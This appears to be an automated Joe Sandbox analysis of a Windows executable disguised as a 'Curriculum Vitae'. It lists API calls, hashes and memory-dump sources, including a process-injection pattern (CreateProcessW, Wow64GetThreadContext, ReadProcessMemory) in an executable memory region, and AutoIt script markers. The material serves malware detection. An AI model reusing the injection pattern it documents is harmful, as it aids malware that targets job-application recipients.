                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$Delete$Copy
                      • String ID:
                      • API String ID: 3226157194-0
                      • Opcode ID: aa5fb5887d9fc5ccf5cec0bc9994265d027d1db3e48dbe5640f68fb0622dfe2a
                      • Instruction ID: 473cbb4e95a1fb17f517b83ec105d92b6c3ecb229fe5561b127d8e12be4f46f4
                      • Opcode Fuzzy Hash: aa5fb5887d9fc5ccf5cec0bc9994265d027d1db3e48dbe5640f68fb0622dfe2a
                      • Instruction Fuzzy Hash: 1DB17D72D00119ABDF25DBA9CC85EEEB7BDEF09350F1040A6FA09E6145EB309A448F71

                      Control-flow Graph

                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B40
                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B61
                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B83
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: e6de1401d4d6e0a2b0dc129e23e9bb0a2318e83df090a98d20ec79ad3aa4e44b
                      • Instruction ID: 77522f4a5b92e1ed293ef2dc028b1dfce8c13836f9b209860bfbe9f4cecab629
                      • Opcode Fuzzy Hash: e6de1401d4d6e0a2b0dc129e23e9bb0a2318e83df090a98d20ec79ad3aa4e44b
                      • Instruction Fuzzy Hash: 86112AB5520209FFDB218FA5DD44EAEB7B8EF04744F144459E905D7210D2319E40A770
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03BB1A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BB1AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BB1B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction ID: d028bfe9cf7708bbd788475925b842bbd137ebe6fe89dfa4ca828d1b7ef83291
                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction Fuzzy Hash: 55621F34A14258DBEB24CFA4C850BEEB375EF58304F1091A9D10DEB394EBB59E81CB59
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D733A2
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D33A04
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_wcslen
                      • String ID: Line:
                      • API String ID: 2289894680-1585850449
                      • Opcode ID: a65d6a0671a194b1776ff113f7eb9bc6cab249486a2c9996b88d226112ab92ef
                      • Instruction ID: da7c96131eb2d5ca12374ebc1ec7af568cf4c79e62e14d6353e9bbd6deb53f64
                      • Opcode Fuzzy Hash: a65d6a0671a194b1776ff113f7eb9bc6cab249486a2c9996b88d226112ab92ef
                      • Instruction Fuzzy Hash: 4831D271408301AEC725EB24DC45BEBB7D8EF40710F04856EF59997191EB749A88CBF2
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D50668
                        • Part of subcall function 00D532A4: RaiseException.KERNEL32(?,?,?,00D5068A,?,00E01444,?,?,?,?,?,?,00D5068A,00D31129,00DF8738,00D31129), ref: 00D53304
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D50685
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 09800a0ff3189a3d41f7fc5bf2e5be6dd135ec819c28ac18ce936fd9ea671902
                      • Instruction ID: 2a7628907467f73474564392a08a2ed172755010f0067722658beba8eb1f99ee
                      • Opcode Fuzzy Hash: 09800a0ff3189a3d41f7fc5bf2e5be6dd135ec819c28ac18ce936fd9ea671902
                      • Instruction Fuzzy Hash: 0BF0C23490070D77CF00BBA4D846D9E7B6C9E00351B644531BD24D65A1FF71DA6DC5B1
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DA302F
                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DA3044
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: c59f62e011449717d3d9bf990386c987eb70f375817854e4a91584d5a310fcfb
                      • Instruction ID: 9e90703f7ed87ca44374bdf2dd4cb7d7df3897707880b55850e709b0c1cac958
                      • Opcode Fuzzy Hash: c59f62e011449717d3d9bf990386c987eb70f375817854e4a91584d5a310fcfb
                      • Instruction Fuzzy Hash: E9D05E725003296BDA20E7A4AC0EFDB7A6CDB05750F0002A1B759E2191DAB0D984CAE4
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DB82F5
                      • TerminateProcess.KERNEL32(00000000), ref: 00DB82FC
                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DB84DD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$CurrentFreeLibraryTerminate
                      • String ID:
                      • API String ID: 146820519-0
                      • Opcode ID: 4d71107a52e11b36b5d049376fcdbc03bc6e0da8dd5717fdf5982a524df0176d
                      • Instruction ID: 013b8906b6e8f82d0a1baac90f5974010794e484b7decfc263ccf236548379c2
                      • Opcode Fuzzy Hash: 4d71107a52e11b36b5d049376fcdbc03bc6e0da8dd5717fdf5982a524df0176d
                      • Instruction Fuzzy Hash: B8124A71908341DFC714DF28C484A6ABBE5FF89314F08895DE99A8B252DB31E945CFA2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$_strcat
                      • String ID:
                      • API String ID: 306214811-0
                      • Opcode ID: ff3a673edead7173302279eed2a893ac1b3ba68c742246b1ce26844525fb79c8
                      • Instruction ID: ce1abf9a1a80158b8de4d9c60fdaae10605e8424eb31180a9accd9d921117a4b
                      • Instruction Fuzzy Hash: EAA16B31604605EFCB18DF58C5E19A9BBA1FF45314B6484ADE94A8F392DB31ED41CFA0
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c97f0f3cf6d67965fbe99adba55585db61c0c7484a6bb096ea1c2e3f4c5f426
                      • Instruction ID: c2a65fefb66af99912991fddb743b564d3bb4567240f31fa0c06f924e187569a
                      • Instruction Fuzzy Hash: 5C51B171D0060AAFCF10DFA9E845FAEBBB8EF05310F190059F845AB299D7719981DB71
                      APIs
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D31BF4
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D31BFC
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D31C07
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D31C12
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D31C1A
                        • Part of subcall function 00D31BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D31C22
                        • Part of subcall function 00D31B4A: RegisterWindowMessageW.USER32(00000004,?,00D312C4), ref: 00D31BA2
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D3136A
                      • OleInitialize.OLE32 ref: 00D31388
                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00D724AB
                      Similarity
                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 1986988660-0
                      • Opcode ID: 67a9d74a9a12ba7cc1596485cc3c6fc1051110f8aeca8ca189a3167162053e96
                      • Instruction ID: 0f7b701a99b28dda9103c81822bc7884ef9a977005b28d986cdecc4bb17e19e9
                      • Instruction Fuzzy Hash: A6718DB49113018FC388DF7AAC466553AE0FB8934475491AEE15AFF3B1EB3245898F61
                      APIs
                        • Part of subcall function 00D33923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D33A04
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D9C259
                      • KillTimer.USER32(?,00000001,?,?), ref: 00D9C261
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D9C270
                      Similarity
                      • API ID: IconNotifyShell_Timer$Kill
                      • String ID:
                      • API String ID: 3500052701-0
                      • Opcode ID: d4c0dd42dcfad4e66b48a02c334a573bb4700fdf543c02d87d0178132016efed
                      • Instruction ID: 6f9b62d0e4e7e7eaf16dc06874ce4168c0f0e5d066d8c0e252edcbc3e2cea251
                      • Instruction Fuzzy Hash: 4231C370914384AFEF228F648855BE7BBEC9B06308F04549ED6DEA7241C3746A88CB65
                      APIs
                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00D685CC,?,00DF8CC8,0000000C), ref: 00D68704
                      • GetLastError.KERNEL32(?,00D685CC,?,00DF8CC8,0000000C), ref: 00D6870E
                      • __dosmaperr.LIBCMT ref: 00D68739
                      Similarity
                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                      • String ID:
                      • API String ID: 490808831-0
                      • Opcode ID: 1f527c43e3eb480070d091a3f9d0107a161e87a95a96f8b05c100084336e126e
                      • Instruction ID: 4a331b9155555beab7029dc7f5cb80446b1abf92e2c4b7feb287d8ad4bc94651
                      • Instruction Fuzzy Hash: 3401D632A056602BD67463B4F845B7E67498B82B74F3D0319F958DB2E6DFA1CCC1A1B0
                      APIs
                      • TranslateMessage.USER32(?), ref: 00D3DB7B
                      • DispatchMessageW.USER32(?), ref: 00D3DB89
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D3DB9F
                      • Sleep.KERNEL32(0000000A), ref: 00D3DBB1
                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00D81CC9
                      Similarity
                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                      • String ID:
                      • API String ID: 3288985973-0
                      • Opcode ID: 393f101408bfa6aa73c424930eb7c320a6b89fed50a848a2f7be0133c77a211a
                      • Instruction ID: 8e4f1e30aacd686e30941391b282daefa0fd06bcc0cdb0269c64b7ec683f6278
                      • Instruction Fuzzy Hash: ADF05E306543429BE734DB60DC89FAAB3BDEB84310F144A18E64AD71C0DB30A489CF35
                      APIs
                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DA2CD4,?,?,?,00000004,00000001), ref: 00DA2FF2
                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DA2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA3006
                      • CloseHandle.KERNEL32(00000000,?,00DA2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA300D
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: 1ad926631ab40e4a131ef3861a0b2c3bc087e529325d09baffa5b0ac6dd17535
                      • Instruction ID: 0e44e1464353058ba25de71a443ba9ac3959b106e6f6294b3fbf6fcc837d0e2a
                      • Instruction Fuzzy Hash: 01E0863269031177D2311756BC0DF8B3A1CD786B71F144210F71DB51D046A0150142B8
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D417F6
                      Strings
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: CALL
                      • API String ID: 1385522511-4196123274
                      • Opcode ID: 5402a5b1542ebcedabbd07735930d8590b30be06810a1df62e04c60171027dda
                      • Instruction ID: 522f9efbf915754bf492faa1af221680ffda7016c2cd28f0a0c272db487e4d5c
                      • Instruction Fuzzy Hash: F52279746083419FC714DF14C494A2ABBF1FF85314F28896DF49A8B3A2D771E885CBA2
                      APIs
                      • _wcslen.LIBCMT ref: 00DA6F6B
                        • Part of subcall function 00D34ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EFD
                      Strings
                      Similarity
                      • API ID: LibraryLoad_wcslen
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 3312870042-2806939583
                      • Opcode ID: 15626f4db81b16ae381af40a36db2e2fddfb3f8b2c74c73e88914fe235f690c7
                      • Instruction ID: 4fc51914fb5dfce4939681884c0789bdf3e9148443296f298c0b15d703756397
                      • Instruction Fuzzy Hash: 95B173712082019FCB14EF24C89196EB7E5FF95310F08895DF596972A2EB30ED49CBB2
                      APIs
                      • GetOpenFileNameW.COMDLG32(?), ref: 00D72C8C
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D32DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D32DC4
                      Strings
                      Similarity
                      • API ID: Name$Path$FileFullLongOpen
                      • String ID: X
                      • API String ID: 779396738-3081909835
                      • Opcode ID: 85ee02e00cac184ec9e4dcca6a1f528877ff39db92702bcf4daa29e3e5bf6b3c
                      • Instruction ID: a1263b58d3eb3f6e12b45c03013656a7ff2f039510684a2e8371481800deba99
                      • Instruction Fuzzy Hash: 90218471A002989BDB41AF94C845BEE7BF8DF49304F008059E549B7341EBB496498BB1
                      APIs
                      Strings
                      Similarity
                      • API ID: __fread_nolock
                      • String ID: EA06
                      • API String ID: 2638373210-3962188686
                      • Opcode ID: 7604a1c08119853560c4ef3ebe77dcbd68d6354ef4f783979d478bdc7b2ce5c1
                      • Instruction ID: 12095c81652fd7d1b07aefa340d470ec3a2371dec5078bd4aaecd08cdfc76577
                      • Instruction Fuzzy Hash: C501B572D042587EDF18D7A8C856EBEBBF8DB05301F00455AF592D6181E5B4E7088B70
                      APIs
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D33908
                      Similarity
                      • API ID: IconNotifyShell_
                      • String ID:
                      • API String ID: 1144537725-0
                      • Opcode ID: f939f9e8767775ef19babdc14b212a7a1b5fd79de99eeecdad87890f74fc0966
                      • Instruction ID: a7a415b10719eaf69f75e900e947a84dc004109351e8e50517f2c22cc97cf3bf
                      • Instruction Fuzzy Hash: C831C170604301CFD720DF25D98479BBBE8FB49309F04096EF99997280E775AA48CBB2
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03BB1A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BB1AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BB1B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction ID: 7fdd5728e5622cfdce6584a8e4a691d6da125a0aacac1078f11b5a196945abda
                      • Instruction Fuzzy Hash: 4D12BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                      APIs
                        • Part of subcall function 00D34E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E9C
                        • Part of subcall function 00D34E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D34EAE
                        • Part of subcall function 00D34E90: FreeLibrary.KERNEL32(00000000,?,?,00D34EDD,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EC0
                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34EFD
                        • Part of subcall function 00D34E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E62
                        • Part of subcall function 00D34E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D34E74
                        • Part of subcall function 00D34E59: FreeLibrary.KERNEL32(00000000,?,?,00D73CDE,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34E87
                      Similarity
                      • API ID: Library$Load$AddressFreeProc
                      • String ID:
                      • API String ID: 2632591731-0
                      • Opcode ID: 870fb522e5ff82064ac84c7339be74cc46fdd0459f487720901334008a3794b9
                      • Instruction ID: 1ed83889eb3b336cdc24ea89063f035715af3618bbc1a4aa3404847670aae5c1
                      • Instruction Fuzzy Hash: 8211C132610305AACB14AB64D812FAD77A5EF40711F14842DF546B61C1EE78EA459B70
                      APIs
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 5ef06025957b1dd772b82189fc176be3996298bdd244680a52d1b792216f379d
                      • Instruction ID: 13902355f1448df0f1516e7df4959874b56843e40e23b544e78d930af319eb4e
                      • Instruction Fuzzy Hash: 5C118836201215CFDB14DF19D4D0AD9F7A9EF89310B09816AEE4A8B351DB30AD41CBB5
                      APIs
                      Similarity
                      • API ID: __wsopen_s
                      • String ID:
                      • API String ID: 3347428461-0
                      • Opcode ID: f8dbaa04a271b171d6c8b3babe8f450562d4a12101c512486d0cdbe28a3d6816
                      • Instruction ID: f0b1ed8621711b554679b59683ec95601e28fef83edc9ec03335f2a29c9a61b2
                      • Instruction Fuzzy Hash: 2911487190420AAFCB05DF58E940A9A7BF5EF48300F144199F808AB312DB31EA11DBA4
                      APIs
                        • Part of subcall function 00D64C7D: RtlAllocateHeap.NTDLL(00000008,00D31129,00000000,?,00D62E29,00000001,00000364,?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?), ref: 00D64CBE
                      • _free.LIBCMT ref: 00D6506C
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                      • Instruction ID: be43e592bab780dbd931fe0169826880624da485b3b18b00e2a445f0f42ef653
                      • Instruction Fuzzy Hash: 670126722047056BE3318F65E881A5AFBE8FB89370F29051DE18483280EB30A845C7B4
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                      • Instruction ID: eca4c2daa6d3ae240c32806f8b6130475caa47494916e6da5376045bbc3bc2b0
                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                      • Instruction Fuzzy Hash: C7F0F432511A109BCF353A698C05B6A3399DF523B3F140B15FC61921D2CB70D90A8AB5
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID:
                      • API String ID: 176396367-0
                      • Opcode ID: 5fcd0f157eb8e673970becaf4c912ed0d6f4fa4dedee55b2a127af683eef8bd5
                      • Instruction ID: cf2ab7813cce76ffdf4a195f2624a39c361b5531ac9e42e1922cdc21cf210cda
                      • Opcode Fuzzy Hash: 5fcd0f157eb8e673970becaf4c912ed0d6f4fa4dedee55b2a127af683eef8bd5
                      • Instruction Fuzzy Hash: 32F0AFB26016016ED7259F29D806AAABB98EB44760F10852AFA1ACB1D1DB71E514CAB0
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,00D31129,00000000,?,00D62E29,00000001,00000364,?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?), ref: 00D64CBE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: ed7aa91ebd2cc012b133024876110e2a0c1c8d5ea3a98654336df05b5c51d282
                      • Instruction ID: 749becd1bda081736fc5952d81f9682c2d4125a54dd68a1edca9e85088716113
                      • Opcode Fuzzy Hash: ed7aa91ebd2cc012b133024876110e2a0c1c8d5ea3a98654336df05b5c51d282
                      • Instruction Fuzzy Hash: 2FF0BE316032246BDB216F679D09B5A3788AFD17A1B1A4125BC1AEA380CB30D80586F0
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: b27f2fd06148db70b4ca0550bf635c8e4d175ea0369b5adbf67043d34d5914a8
                      • Instruction ID: 183caaa5e9bfe123b8869cee00d71fc97cd3215e400e7f45a4e7cdc392797dff
                      • Opcode Fuzzy Hash: b27f2fd06148db70b4ca0550bf635c8e4d175ea0369b5adbf67043d34d5914a8
                      • Instruction Fuzzy Hash: E6E0ED31202325ABEA212AA79C05BDA3749EF827B1F0D0020BC45E7981CB21DE0282F1
                      APIs
                      • FreeLibrary.KERNEL32(?,?,00E01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D34F6D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FreeLibrary
